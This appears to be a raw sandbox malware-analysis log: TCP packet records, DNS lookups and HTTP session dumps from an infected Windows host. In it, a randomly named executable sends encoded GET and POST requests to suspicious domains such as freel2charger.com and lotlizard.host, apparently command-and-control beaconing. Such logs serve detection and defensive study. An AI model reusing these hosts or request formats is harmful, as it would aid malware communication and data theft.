            Sep 16, 2024 14:45:15.395055056 CEST44349732142.250.185.193192.168.2.4
            Sep 16, 2024 14:45:15.395169020 CEST49732443192.168.2.4142.250.185.193
            Sep 16, 2024 14:45:15.395179987 CEST44349732142.250.185.193192.168.2.4
            Sep 16, 2024 14:45:15.395405054 CEST44349732142.250.185.193192.168.2.4
            Sep 16, 2024 14:45:15.395450115 CEST49732443192.168.2.4142.250.185.193
            Sep 16, 2024 14:45:15.395458937 CEST44349732142.250.185.193192.168.2.4
            Sep 16, 2024 14:45:15.395561934 CEST44349732142.250.185.193192.168.2.4
            Sep 16, 2024 14:45:15.395607948 CEST49732443192.168.2.4142.250.185.193
            Sep 16, 2024 14:45:15.395617962 CEST44349732142.250.185.193192.168.2.4
            Sep 16, 2024 14:45:15.395704031 CEST44349732142.250.185.193192.168.2.4
            Sep 16, 2024 14:45:15.395751953 CEST49732443192.168.2.4142.250.185.193
            Sep 16, 2024 14:45:15.395760059 CEST44349732142.250.185.193192.168.2.4
            Sep 16, 2024 14:45:15.407044888 CEST44349732142.250.185.193192.168.2.4
            Sep 16, 2024 14:45:15.407099962 CEST49732443192.168.2.4142.250.185.193
            Sep 16, 2024 14:45:51.403326035 CEST44349740142.250.185.193192.168.2.4
            Sep 16, 2024 14:45:51.403393984 CEST49740443192.168.2.4142.250.185.193
            Sep 16, 2024 14:45:51.403423071 CEST44349740142.250.185.193192.168.2.4
            Sep 16, 2024 14:45:51.403476954 CEST49740443192.168.2.4142.250.185.193
            Sep 16, 2024 14:45:51.405426979 CEST44349740142.250.185.193192.168.2.4
            Sep 16, 2024 14:45:51.407557011 CEST44349740142.250.185.193192.168.2.4
            Sep 16, 2024 14:45:51.407640934 CEST49740443192.168.2.4142.250.185.193
            Sep 16, 2024 14:45:51.407649994 CEST44349740142.250.185.193192.168.2.4
            Sep 16, 2024 14:45:51.407680035 CEST44349740142.250.185.193192.168.2.4
            Sep 16, 2024 14:45:51.407700062 CEST49740443192.168.2.4142.250.185.193
            Sep 16, 2024 14:45:51.407721043 CEST49740443192.168.2.4142.250.185.193
            Sep 16, 2024 14:45:51.409419060 CEST44349740142.250.185.193192.168.2.4
            Sep 16, 2024 14:45:51.411571026 CEST44349740142.250.185.193192.168.2.4
            Sep 16, 2024 14:45:51.411694050 CEST44349740142.250.185.193192.168.2.4
            Sep 16, 2024 14:45:51.411739111 CEST49740443192.168.2.4142.250.185.193
            Sep 16, 2024 14:45:51.411748886 CEST44349740142.250.185.193192.168.2.4
            Sep 16, 2024 14:45:51.411775112 CEST49740443192.168.2.4142.250.185.193
            Sep 16, 2024 14:45:51.411793947 CEST49740443192.168.2.4142.250.185.193
            Sep 16, 2024 14:45:51.413847923 CEST44349740142.250.185.193192.168.2.4
            Sep 16, 2024 14:45:51.415735006 CEST44349740142.250.185.193192.168.2.4
            Sep 16, 2024 14:45:51.415816069 CEST49740443192.168.2.4142.250.185.193
            Sep 16, 2024 14:45:51.415824890 CEST44349740142.250.185.193192.168.2.4
            Sep 16, 2024 14:45:51.415872097 CEST49740443192.168.2.4142.250.185.193
            Sep 16, 2024 14:45:51.415878057 CEST44349740142.250.185.193192.168.2.4
            Sep 16, 2024 14:45:51.415925980 CEST49740443192.168.2.4142.250.185.193
            Sep 16, 2024 14:45:51.417710066 CEST44349740142.250.185.193192.168.2.4
            Sep 16, 2024 14:45:51.419699907 CEST44349740142.250.185.193192.168.2.4
            Sep 16, 2024 14:45:51.419769049 CEST49740443192.168.2.4142.250.185.193
            Sep 16, 2024 14:45:51.419778109 CEST44349740142.250.185.193192.168.2.4
            Sep 16, 2024 14:45:51.419815063 CEST49740443192.168.2.4142.250.185.193
            Sep 16, 2024 14:45:51.419821024 CEST44349740142.250.185.193192.168.2.4
            Sep 16, 2024 14:45:51.419878006 CEST49740443192.168.2.4142.250.185.193
            Sep 16, 2024 14:45:51.422867060 CEST44349740142.250.185.193192.168.2.4
            Sep 16, 2024 14:45:51.424005032 CEST44349740142.250.185.193192.168.2.4
            Sep 16, 2024 14:45:51.424052000 CEST44349740142.250.185.193192.168.2.4
            Sep 16, 2024 14:45:51.424083948 CEST49740443192.168.2.4142.250.185.193
            Sep 16, 2024 14:45:51.424096107 CEST44349740142.250.185.193192.168.2.4
            Sep 16, 2024 14:45:51.424117088 CEST49740443192.168.2.4142.250.185.193
            Sep 16, 2024 14:45:51.424137115 CEST49740443192.168.2.4142.250.185.193
            Sep 16, 2024 14:45:51.426649094 CEST44349740142.250.185.193192.168.2.4
            Sep 16, 2024 14:45:51.427943945 CEST49740443192.168.2.4142.250.185.193
            Sep 16, 2024 14:45:51.427952051 CEST44349740142.250.185.193192.168.2.4
            Sep 16, 2024 14:45:51.427995920 CEST49740443192.168.2.4142.250.185.193
            Sep 16, 2024 14:45:51.428002119 CEST44349740142.250.185.193192.168.2.4
            Sep 16, 2024 14:45:51.428045988 CEST49740443192.168.2.4142.250.185.193
            Sep 16, 2024 14:45:51.428050041 CEST44349740142.250.185.193192.168.2.4
            Sep 16, 2024 14:45:51.428064108 CEST44349740142.250.185.193192.168.2.4
            Sep 16, 2024 14:45:51.428092003 CEST49740443192.168.2.4142.250.185.193
            Sep 16, 2024 14:45:51.428126097 CEST49740443192.168.2.4142.250.185.193
            Sep 16, 2024 14:45:51.430511951 CEST44349740142.250.185.193192.168.2.4
            Sep 16, 2024 14:45:51.430562973 CEST49740443192.168.2.4142.250.185.193
            Sep 16, 2024 14:45:51.430609941 CEST44349740142.250.185.193192.168.2.4
            Sep 16, 2024 14:45:51.430656910 CEST49740443192.168.2.4142.250.185.193
            Sep 16, 2024 14:45:51.431718111 CEST44349740142.250.185.193192.168.2.4
            Sep 16, 2024 14:45:51.431771994 CEST49740443192.168.2.4142.250.185.193
            Sep 16, 2024 14:45:51.431778908 CEST44349740142.250.185.193192.168.2.4
            Sep 16, 2024 14:45:51.431823969 CEST49740443192.168.2.4142.250.185.193
            Sep 16, 2024 14:45:51.434592009 CEST44349740142.250.185.193192.168.2.4
            Sep 16, 2024 14:45:51.434650898 CEST49740443192.168.2.4142.250.185.193
            Sep 16, 2024 14:45:51.434657097 CEST44349740142.250.185.193192.168.2.4
            Sep 16, 2024 14:45:51.434695959 CEST49740443192.168.2.4142.250.185.193
            Sep 16, 2024 14:45:51.436013937 CEST44349740142.250.185.193192.168.2.4
            Sep 16, 2024 14:45:51.436075926 CEST49740443192.168.2.4142.250.185.193
            Sep 16, 2024 14:45:51.436083078 CEST44349740142.250.185.193192.168.2.4
            Sep 16, 2024 14:45:51.436130047 CEST49740443192.168.2.4142.250.185.193
            Sep 16, 2024 14:45:51.438467026 CEST44349740142.250.185.193192.168.2.4
            Sep 16, 2024 14:45:51.438523054 CEST49740443192.168.2.4142.250.185.193
            Sep 16, 2024 14:45:51.438529015 CEST44349740142.250.185.193192.168.2.4
            Sep 16, 2024 14:45:51.438605070 CEST49740443192.168.2.4142.250.185.193
            Sep 16, 2024 14:45:51.439618111 CEST44349740142.250.185.193192.168.2.4
            Sep 16, 2024 14:45:51.439675093 CEST49740443192.168.2.4142.250.185.193
            Sep 16, 2024 14:45:51.439702034 CEST44349740142.250.185.193192.168.2.4
            Sep 16, 2024 14:45:51.439753056 CEST49740443192.168.2.4142.250.185.193
            Sep 16, 2024 14:45:51.443778038 CEST44349740142.250.185.193192.168.2.4
            Sep 16, 2024 14:45:51.443846941 CEST49740443192.168.2.4142.250.185.193
            Sep 16, 2024 14:45:51.443891048 CEST44349740142.250.185.193192.168.2.4
            Sep 16, 2024 14:45:51.444108963 CEST49740443192.168.2.4142.250.185.193
            Sep 16, 2024 14:45:51.444114923 CEST44349740142.250.185.193192.168.2.4
            Sep 16, 2024 14:45:51.444139004 CEST44349740142.250.185.193192.168.2.4
            Sep 16, 2024 14:45:51.444174051 CEST49740443192.168.2.4142.250.185.193
            Sep 16, 2024 14:45:51.444214106 CEST49740443192.168.2.4142.250.185.193
            Sep 16, 2024 14:45:51.447313070 CEST44349740142.250.185.193192.168.2.4
            Sep 16, 2024 14:45:51.447376013 CEST49740443192.168.2.4142.250.185.193
            Sep 16, 2024 14:45:51.447465897 CEST44349740142.250.185.193192.168.2.4
            Sep 16, 2024 14:45:51.447518110 CEST49740443192.168.2.4142.250.185.193
            Sep 16, 2024 14:45:51.447551966 CEST44349740142.250.185.193192.168.2.4
            Sep 16, 2024 14:45:51.447601080 CEST49740443192.168.2.4142.250.185.193
            Sep 16, 2024 14:45:51.447633028 CEST44349740142.250.185.193192.168.2.4
            Sep 16, 2024 14:45:51.447684050 CEST49740443192.168.2.4142.250.185.193
            Sep 16, 2024 14:45:51.451091051 CEST44349740142.250.185.193192.168.2.4
            Sep 16, 2024 14:45:51.451266050 CEST44349740142.250.185.193192.168.2.4
            Sep 16, 2024 14:45:51.451324940 CEST49740443192.168.2.4142.250.185.193
            Sep 16, 2024 14:45:51.451332092 CEST44349740142.250.185.193192.168.2.4
            Sep 16, 2024 14:45:51.451369047 CEST49740443192.168.2.4142.250.185.193
            Sep 16, 2024 14:45:51.451374054 CEST44349740142.250.185.193192.168.2.4
            Sep 16, 2024 14:45:51.451432943 CEST49740443192.168.2.4142.250.185.193
            Sep 16, 2024 14:45:51.453351021 CEST44349740142.250.185.193192.168.2.4
            Sep 16, 2024 14:45:51.453398943 CEST49740443192.168.2.4142.250.185.193
            Sep 16, 2024 14:45:51.453432083 CEST44349740142.250.185.193192.168.2.4
            Sep 16, 2024 14:45:51.453569889 CEST49740443192.168.2.4142.250.185.193
            Sep 16, 2024 14:45:51.454797029 CEST44349740142.250.185.193192.168.2.4
            Sep 16, 2024 14:45:51.454848051 CEST49740443192.168.2.4142.250.185.193
            Sep 16, 2024 14:45:51.454885960 CEST44349740142.250.185.193192.168.2.4
            Sep 16, 2024 14:45:51.454932928 CEST49740443192.168.2.4142.250.185.193
            Sep 16, 2024 14:45:51.456983089 CEST44349740142.250.185.193192.168.2.4
            Sep 16, 2024 14:45:51.457036972 CEST49740443192.168.2.4142.250.185.193
            Sep 16, 2024 14:45:51.457175970 CEST44349740142.250.185.193192.168.2.4
            Sep 16, 2024 14:45:51.457231998 CEST49740443192.168.2.4142.250.185.193
            Sep 16, 2024 14:45:51.459212065 CEST44349740142.250.185.193192.168.2.4
            Sep 16, 2024 14:45:51.459285975 CEST49740443192.168.2.4142.250.185.193
            Sep 16, 2024 14:45:51.459355116 CEST44349740142.250.185.193192.168.2.4
            Sep 16, 2024 14:45:51.459403992 CEST49740443192.168.2.4142.250.185.193
            Sep 16, 2024 14:45:51.459884882 CEST44349740142.250.185.193192.168.2.4
            Sep 16, 2024 14:45:51.459938049 CEST49740443192.168.2.4142.250.185.193
            Sep 16, 2024 14:45:51.459980965 CEST44349740142.250.185.193192.168.2.4
            Sep 16, 2024 14:45:51.460032940 CEST49740443192.168.2.4142.250.185.193
            Sep 16, 2024 14:45:51.461604118 CEST44349740142.250.185.193192.168.2.4
            Sep 16, 2024 14:45:51.461659908 CEST49740443192.168.2.4142.250.185.193
            Sep 16, 2024 14:45:51.461688995 CEST44349740142.250.185.193192.168.2.4
            Sep 16, 2024 14:45:51.461745024 CEST49740443192.168.2.4142.250.185.193
            Sep 16, 2024 14:45:51.463134050 CEST44349740142.250.185.193192.168.2.4
            Sep 16, 2024 14:45:51.463186979 CEST49740443192.168.2.4142.250.185.193
            Sep 16, 2024 14:45:51.463215113 CEST44349740142.250.185.193192.168.2.4
            Sep 16, 2024 14:45:51.463269949 CEST49740443192.168.2.4142.250.185.193
            Sep 16, 2024 14:45:51.464561939 CEST44349740142.250.185.193192.168.2.4
            Sep 16, 2024 14:45:51.464612007 CEST49740443192.168.2.4142.250.185.193
            Sep 16, 2024 14:45:51.464642048 CEST44349740142.250.185.193192.168.2.4
            Sep 16, 2024 14:45:51.464704990 CEST49740443192.168.2.4142.250.185.193
            Sep 16, 2024 14:45:51.466114044 CEST44349740142.250.185.193192.168.2.4
            Sep 16, 2024 14:45:51.466171026 CEST49740443192.168.2.4142.250.185.193
            Sep 16, 2024 14:45:51.466192961 CEST44349740142.250.185.193192.168.2.4
            Sep 16, 2024 14:45:51.466244936 CEST49740443192.168.2.4142.250.185.193
            Sep 16, 2024 14:45:51.467600107 CEST44349740142.250.185.193192.168.2.4
            Sep 16, 2024 14:45:51.467663050 CEST49740443192.168.2.4142.250.185.193
            Sep 16, 2024 14:45:51.467683077 CEST44349740142.250.185.193192.168.2.4
            Sep 16, 2024 14:45:51.467812061 CEST49740443192.168.2.4142.250.185.193
            Sep 16, 2024 14:45:51.469192982 CEST44349740142.250.185.193192.168.2.4
            Sep 16, 2024 14:45:51.469254971 CEST49740443192.168.2.4142.250.185.193
            Sep 16, 2024 14:45:51.469275951 CEST44349740142.250.185.193192.168.2.4
            Sep 16, 2024 14:45:51.469324112 CEST49740443192.168.2.4142.250.185.193
            Sep 16, 2024 14:45:51.470453978 CEST44349740142.250.185.193192.168.2.4
            Sep 16, 2024 14:45:51.470509052 CEST49740443192.168.2.4142.250.185.193
            Sep 16, 2024 14:45:51.470535994 CEST44349740142.250.185.193192.168.2.4
            Sep 16, 2024 14:45:51.470592022 CEST49740443192.168.2.4142.250.185.193
            Sep 16, 2024 14:45:51.471949100 CEST44349740142.250.185.193192.168.2.4
            Sep 16, 2024 14:45:51.472003937 CEST49740443192.168.2.4142.250.185.193
            Sep 16, 2024 14:45:51.472045898 CEST44349740142.250.185.193192.168.2.4
            Sep 16, 2024 14:45:51.472095966 CEST49740443192.168.2.4142.250.185.193
            Sep 16, 2024 14:45:51.476515055 CEST44349740142.250.185.193192.168.2.4
            Sep 16, 2024 14:45:51.478097916 CEST44349740142.250.185.193192.168.2.4
            Sep 16, 2024 14:45:51.478168011 CEST49740443192.168.2.4142.250.185.193
            Sep 16, 2024 14:45:51.478182077 CEST44349740142.250.185.193192.168.2.4
            Sep 16, 2024 14:45:51.478223085 CEST49740443192.168.2.4142.250.185.193
            Sep 16, 2024 14:45:51.478229046 CEST44349740142.250.185.193192.168.2.4
            Sep 16, 2024 14:45:51.478269100 CEST49740443192.168.2.4142.250.185.193
            Sep 16, 2024 14:45:51.480918884 CEST44349740142.250.185.193192.168.2.4
            Sep 16, 2024 14:45:51.483079910 CEST44349740142.250.185.193192.168.2.4
            Sep 16, 2024 14:45:51.483160019 CEST49740443192.168.2.4142.250.185.193
            Sep 16, 2024 14:45:51.483166933 CEST44349740142.250.185.193192.168.2.4
            Sep 16, 2024 14:45:51.483207941 CEST49740443192.168.2.4142.250.185.193
            Sep 16, 2024 14:45:51.483212948 CEST44349740142.250.185.193192.168.2.4
            Sep 16, 2024 14:45:51.483253002 CEST49740443192.168.2.4142.250.185.193
            Sep 16, 2024 14:45:51.487441063 CEST44349740142.250.185.193192.168.2.4
            Sep 16, 2024 14:45:51.487592936 CEST44349740142.250.185.193192.168.2.4
            Sep 16, 2024 14:45:51.487652063 CEST49740443192.168.2.4142.250.185.193
            Sep 16, 2024 14:45:51.487658978 CEST44349740142.250.185.193192.168.2.4
            Sep 16, 2024 14:45:51.487694979 CEST49740443192.168.2.4142.250.185.193
            Sep 16, 2024 14:45:51.487699986 CEST44349740142.250.185.193192.168.2.4
            Sep 16, 2024 14:45:51.487740040 CEST49740443192.168.2.4142.250.185.193
            Sep 16, 2024 14:45:51.487796068 CEST44349740142.250.185.193192.168.2.4
            Sep 16, 2024 14:45:51.487852097 CEST49740443192.168.2.4142.250.185.193
            Sep 16, 2024 14:45:51.491204023 CEST44349740142.250.185.193192.168.2.4
            Sep 16, 2024 14:45:51.491252899 CEST49740443192.168.2.4142.250.185.193
            Sep 16, 2024 14:45:51.491329908 CEST44349740142.250.185.193192.168.2.4
            Sep 16, 2024 14:45:51.491394043 CEST49740443192.168.2.4142.250.185.193
            Sep 16, 2024 14:45:51.491470098 CEST44349740142.250.185.193192.168.2.4
            Sep 16, 2024 14:45:51.491527081 CEST49740443192.168.2.4142.250.185.193
            Sep 16, 2024 14:45:51.491561890 CEST44349740142.250.185.193192.168.2.4
            Sep 16, 2024 14:45:51.491615057 CEST49740443192.168.2.4142.250.185.193
            Sep 16, 2024 14:45:51.491652012 CEST44349740142.250.185.193192.168.2.4
            Sep 16, 2024 14:45:51.491710901 CEST49740443192.168.2.4142.250.185.193
            Sep 16, 2024 14:45:51.491734982 CEST44349740142.250.185.193192.168.2.4
            Sep 16, 2024 14:45:51.491786957 CEST49740443192.168.2.4142.250.185.193
            Sep 16, 2024 14:45:51.495839119 CEST44349740142.250.185.193192.168.2.4
            Sep 16, 2024 14:45:51.495894909 CEST49740443192.168.2.4142.250.185.193
            Sep 16, 2024 14:45:51.496006966 CEST44349740142.250.185.193192.168.2.4
            Sep 16, 2024 14:45:51.496057034 CEST49740443192.168.2.4142.250.185.193
            Sep 16, 2024 14:45:51.496090889 CEST49740443192.168.2.4142.250.185.193
            Sep 16, 2024 14:45:51.496093988 CEST44349740142.250.185.193192.168.2.4
            Sep 16, 2024 14:45:51.496251106 CEST49740443192.168.2.4142.250.185.193
            Sep 16, 2024 14:45:51.496258974 CEST44349740142.250.185.193192.168.2.4
            Sep 16, 2024 14:45:51.496311903 CEST49740443192.168.2.4142.250.185.193
            Sep 16, 2024 14:46:25.917165041 CEST4974280192.168.2.464.98.135.118
            Sep 16, 2024 14:46:25.922094107 CEST804974264.98.135.118192.168.2.4
            Sep 16, 2024 14:46:25.922270060 CEST4974280192.168.2.464.98.135.118
            Sep 16, 2024 14:46:25.929341078 CEST4974280192.168.2.464.98.135.118
            Sep 16, 2024 14:46:25.934473991 CEST804974264.98.135.118192.168.2.4
            Sep 16, 2024 14:46:26.457982063 CEST804974264.98.135.118192.168.2.4
            Sep 16, 2024 14:46:26.458354950 CEST804974264.98.135.118192.168.2.4
            Sep 16, 2024 14:46:26.458436012 CEST4974280192.168.2.464.98.135.118
            Sep 16, 2024 14:46:26.461410046 CEST4974280192.168.2.464.98.135.118
            Sep 16, 2024 14:46:26.466243029 CEST804974264.98.135.118192.168.2.4
            Sep 16, 2024 14:46:41.556912899 CEST4974380192.168.2.466.29.141.40
            Sep 16, 2024 14:46:41.561743975 CEST804974366.29.141.40192.168.2.4
            Sep 16, 2024 14:46:41.563404083 CEST4974380192.168.2.466.29.141.40
            Sep 16, 2024 14:46:41.574063063 CEST4974380192.168.2.466.29.141.40
            Sep 16, 2024 14:46:41.578846931 CEST804974366.29.141.40192.168.2.4
            Sep 16, 2024 14:46:42.163629055 CEST804974366.29.141.40192.168.2.4
            Sep 16, 2024 14:46:42.163687944 CEST804974366.29.141.40192.168.2.4
            Sep 16, 2024 14:46:42.163727045 CEST804974366.29.141.40192.168.2.4
            Sep 16, 2024 14:46:42.163747072 CEST4974380192.168.2.466.29.141.40
            Sep 16, 2024 14:46:42.163891077 CEST4974380192.168.2.466.29.141.40
            Sep 16, 2024 14:46:43.076448917 CEST4974380192.168.2.466.29.141.40
            Sep 16, 2024 14:46:44.095979929 CEST4974480192.168.2.466.29.141.40
            Sep 16, 2024 14:46:44.100912094 CEST804974466.29.141.40192.168.2.4
            Sep 16, 2024 14:46:44.100994110 CEST4974480192.168.2.466.29.141.40
            Sep 16, 2024 14:46:44.114041090 CEST4974480192.168.2.466.29.141.40
            Sep 16, 2024 14:46:44.118946075 CEST804974466.29.141.40192.168.2.4
            Sep 16, 2024 14:46:44.703094959 CEST804974466.29.141.40192.168.2.4
            Sep 16, 2024 14:46:44.703139067 CEST804974466.29.141.40192.168.2.4
            Sep 16, 2024 14:46:44.703207016 CEST804974466.29.141.40192.168.2.4
            Sep 16, 2024 14:46:44.703298092 CEST4974480192.168.2.466.29.141.40
            Sep 16, 2024 14:46:44.703298092 CEST4974480192.168.2.466.29.141.40
            Sep 16, 2024 14:46:45.623452902 CEST4974480192.168.2.466.29.141.40
            Sep 16, 2024 14:46:46.641495943 CEST4974580192.168.2.466.29.141.40
            Sep 16, 2024 14:46:46.646787882 CEST804974566.29.141.40192.168.2.4
            Sep 16, 2024 14:46:46.646899939 CEST4974580192.168.2.466.29.141.40
            Sep 16, 2024 14:46:46.655886889 CEST4974580192.168.2.466.29.141.40
            Sep 16, 2024 14:46:46.660928965 CEST804974566.29.141.40192.168.2.4
            Sep 16, 2024 14:46:46.660959005 CEST804974566.29.141.40192.168.2.4
            Sep 16, 2024 14:46:46.660984993 CEST804974566.29.141.40192.168.2.4
            Sep 16, 2024 14:46:46.661041975 CEST804974566.29.141.40192.168.2.4
            Sep 16, 2024 14:46:46.661070108 CEST804974566.29.141.40192.168.2.4
            Sep 16, 2024 14:46:46.661096096 CEST804974566.29.141.40192.168.2.4
            Sep 16, 2024 14:46:46.661120892 CEST804974566.29.141.40192.168.2.4
            Sep 16, 2024 14:46:46.661147118 CEST804974566.29.141.40192.168.2.4
            Sep 16, 2024 14:46:46.661180019 CEST804974566.29.141.40192.168.2.4
            Sep 16, 2024 14:46:47.229249954 CEST804974566.29.141.40192.168.2.4
            Sep 16, 2024 14:46:47.229305983 CEST804974566.29.141.40192.168.2.4
            Sep 16, 2024 14:46:47.229473114 CEST4974580192.168.2.466.29.141.40
            Sep 16, 2024 14:46:47.229479074 CEST804974566.29.141.40192.168.2.4
            Sep 16, 2024 14:46:47.229535103 CEST4974580192.168.2.466.29.141.40
            Sep 16, 2024 14:46:48.170268059 CEST4974580192.168.2.466.29.141.40
            Sep 16, 2024 14:46:49.188409090 CEST4974680192.168.2.466.29.141.40
            Sep 16, 2024 14:46:49.193443060 CEST804974666.29.141.40192.168.2.4
            Sep 16, 2024 14:46:49.193558931 CEST4974680192.168.2.466.29.141.40
            Sep 16, 2024 14:46:49.202543974 CEST4974680192.168.2.466.29.141.40
            Sep 16, 2024 14:46:49.208962917 CEST804974666.29.141.40192.168.2.4
            Sep 16, 2024 14:46:49.774950981 CEST804974666.29.141.40192.168.2.4
            Sep 16, 2024 14:46:49.774979115 CEST804974666.29.141.40192.168.2.4
            Sep 16, 2024 14:46:49.774996996 CEST804974666.29.141.40192.168.2.4
            Sep 16, 2024 14:46:49.775182962 CEST4974680192.168.2.466.29.141.40
            Sep 16, 2024 14:46:49.775296926 CEST4974680192.168.2.466.29.141.40
            Sep 16, 2024 14:46:49.778918028 CEST4974680192.168.2.466.29.141.40
            Sep 16, 2024 14:46:49.783798933 CEST804974666.29.141.40192.168.2.4
            Sep 16, 2024 14:47:04.174483061 CEST4974780192.168.2.435.190.52.58
            Sep 16, 2024 14:47:04.179347992 CEST804974735.190.52.58192.168.2.4
            Sep 16, 2024 14:47:04.179444075 CEST4974780192.168.2.435.190.52.58
            Sep 16, 2024 14:47:04.193875074 CEST4974780192.168.2.435.190.52.58
            Sep 16, 2024 14:47:04.198784113 CEST804974735.190.52.58192.168.2.4
            Sep 16, 2024 14:47:04.841710091 CEST804974735.190.52.58192.168.2.4
            Sep 16, 2024 14:47:04.842608929 CEST804974735.190.52.58192.168.2.4
            Sep 16, 2024 14:47:04.842634916 CEST804974735.190.52.58192.168.2.4
            Sep 16, 2024 14:47:04.842715979 CEST4974780192.168.2.435.190.52.58
            Sep 16, 2024 14:47:04.842746973 CEST4974780192.168.2.435.190.52.58
            Sep 16, 2024 14:47:05.701356888 CEST4974780192.168.2.435.190.52.58
            Sep 16, 2024 14:47:06.720344067 CEST4974880192.168.2.435.190.52.58
            Sep 16, 2024 14:47:06.725440979 CEST804974835.190.52.58192.168.2.4
            Sep 16, 2024 14:47:06.725577116 CEST4974880192.168.2.435.190.52.58
            Sep 16, 2024 14:47:06.736052036 CEST4974880192.168.2.435.190.52.58
            Sep 16, 2024 14:47:06.740974903 CEST804974835.190.52.58192.168.2.4
            Sep 16, 2024 14:47:07.378307104 CEST804974835.190.52.58192.168.2.4
            Sep 16, 2024 14:47:07.381711960 CEST804974835.190.52.58192.168.2.4
            Sep 16, 2024 14:47:07.381747007 CEST804974835.190.52.58192.168.2.4
            Sep 16, 2024 14:47:07.381793022 CEST4974880192.168.2.435.190.52.58
            Sep 16, 2024 14:47:07.381793022 CEST4974880192.168.2.435.190.52.58
            Sep 16, 2024 14:47:08.654592037 CEST4974880192.168.2.435.190.52.58
            Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
            Sep 16, 2024 14:45:05.340198040 CEST | 192.168.2.4 | 1.1.1.1 | 0x958f | Standard query (0) | drive.google.com | A (IP address) | IN (0x0001) | false
            Sep 16, 2024 14:45:06.706384897 CEST | 192.168.2.4 | 1.1.1.1 | 0xc3f1 | Standard query (0) | drive.usercontent.google.com | A (IP address) | IN (0x0001) | false
            Sep 16, 2024 14:46:25.682423115 CEST | 192.168.2.4 | 1.1.1.1 | 0x3487 | Standard query (0) | www.freel2charger.com | A (IP address) | IN (0x0001) | false
            Sep 16, 2024 14:46:41.517086983 CEST | 192.168.2.4 | 1.1.1.1 | 0xe2f0 | Standard query (0) | www.lotlizard.host | A (IP address) | IN (0x0001) | false
            Sep 16, 2024 14:46:54.784027100 CEST | 192.168.2.4 | 1.1.1.1 | 0x6d7a | Standard query (0) | www.amkmos.online | A (IP address) | IN (0x0001) | false
            Sep 16, 2024 14:47:03.496795893 CEST | 192.168.2.4 | 1.1.1.1 | 0x475f | Standard query (0) | www.hsck520.com | A (IP address) | IN (0x0001) | false

            Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
            Sep 16, 2024 14:45:05.620306015 CEST | 1.1.1.1 | 192.168.2.4 | 0x958f | No error (0) | drive.google.com | | 142.250.185.110 | A (IP address) | IN (0x0001) | false
            Sep 16, 2024 14:45:06.714308023 CEST | 1.1.1.1 | 192.168.2.4 | 0xc3f1 | No error (0) | drive.usercontent.google.com | | 142.250.185.193 | A (IP address) | IN (0x0001) | false
            Sep 16, 2024 14:46:25.911734104 CEST | 1.1.1.1 | 192.168.2.4 | 0x3487 | No error (0) | www.freel2charger.com | | 64.98.135.118 | A (IP address) | IN (0x0001) | false
            Sep 16, 2024 14:46:41.554780960 CEST | 1.1.1.1 | 192.168.2.4 | 0xe2f0 | No error (0) | www.lotlizard.host | lotlizard.host | | CNAME (Canonical name) | IN (0x0001) | false
            Sep 16, 2024 14:46:41.554780960 CEST | 1.1.1.1 | 192.168.2.4 | 0xe2f0 | No error (0) | lotlizard.host | | 66.29.141.40 | A (IP address) | IN (0x0001) | false
            Sep 16, 2024 14:46:54.827878952 CEST | 1.1.1.1 | 192.168.2.4 | 0x6d7a | Name error (3) | www.amkmos.online | none | none | A (IP address) | IN (0x0001) | false
            Sep 16, 2024 14:47:04.170742989 CEST | 1.1.1.1 | 192.168.2.4 | 0x475f | No error (0) | www.hsck520.com | | 35.190.52.58 | A (IP address) | IN (0x0001) | false
            • drive.google.com
            • drive.usercontent.google.com
            • www.freel2charger.com
            • www.lotlizard.host
            • www.hsck520.com
            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
            0 | 192.168.2.4 | 49742 | 64.98.135.118 | 80 | 5596 | C:\Program Files (x86)\HhPMOUbrMwvnZpYkhfFwOVIirWvRXtNCLbsuCqvYQqqyWREgrkZCMneQzvJBwCunRLyoTGpWisniw\osqpHpjBCXXA.exe

            Timestamp | Bytes transferred | Direction | Data
            Sep 16, 2024 14:46:25.929341078 CEST | 457 | OUT | GET /43cj/?yD74=KV788dEH1&7JP=T5xbhsi5FuhzvTEQw2+KT2FsHNx9t47tozcKf+wmva0DEtOyEm69qyqfdc34c7IFdYZ32FzEk2z+82aLMtRHRH5540be2ISaKbwCt+kNSrDfOHoX6kdHk1g= HTTP/1.1
            Host: www.freel2charger.com
            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
            Accept-Language: en-US,en
            Connection: close
            User-Agent: Mozilla/5.0 (Linux; Android 5.1.1; S6 Build/G920TU) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.114 Mobile Safari/537.36
            Sep 16, 2024 14:46:26.457982063 CEST | 973 | IN | HTTP/1.1 200 OK
            Server: nginx/1.14.2
            Date: Mon, 16 Sep 2024 12:46:26 GMT
            Content-Type: text/html; charset=UTF-8
            Transfer-Encoding: chunked
            Connection: close
            Data Ascii: 31c<html><head><title></title></head>... Redirection Services cen0vlredir01 --><frameset rows='100%, *' frameborder=no framespacing=0 border=0><frame src="http://www.simpleurl.com/parking/43cj/?yD74=KV788dEH1&7JP=T5xbhsi5FuhzvTEQw2 KT2FsHNx9t47tozcKf wmva0DEtOyEm69qyqfdc34c7IFdYZ32FzEk2z 82aLMtRHRH5540be2ISaKbwCt kNSrDfOHoX6kdHk1g=" name=mainwindow frameborder=no framespacing=0 marginheight=0 marginwidth=0></frame></frameset><noframes><h2>Your browser does not support frames. We recommend upgrading your browser.</h2><br><br><center>Click <a href="http://www.simpleurl.com/parking/43cj/?yD74=KV788dEH1&7JP=T5xbhsi5FuhzvTEQw2 KT2FsHNx9t47tozcKf wmva0DEtOyEm69qyqfdc34c7IFdYZ32FzEk2z 82aLMtRHRH5540be2ISaKbwCt kNSrDfOHoX6kdHk1g=">here</a> to enter the site.</center></noframes></html>0


            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
            1 | 192.168.2.4 | 49743 | 66.29.141.40 | 80 | 5596 | C:\Program Files (x86)\HhPMOUbrMwvnZpYkhfFwOVIirWvRXtNCLbsuCqvYQqqyWREgrkZCMneQzvJBwCunRLyoTGpWisniw\osqpHpjBCXXA.exe

            Timestamp | Bytes transferred | Direction | Data
            Sep 16, 2024 14:46:41.574063063 CEST | 719 | OUT | POST /alsy/ HTTP/1.1
            Host: www.lotlizard.host
            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
            Accept-Encoding: gzip, deflate
            Accept-Language: en-US,en
            Connection: close
            Cache-Control: no-cache
            Content-Length: 200
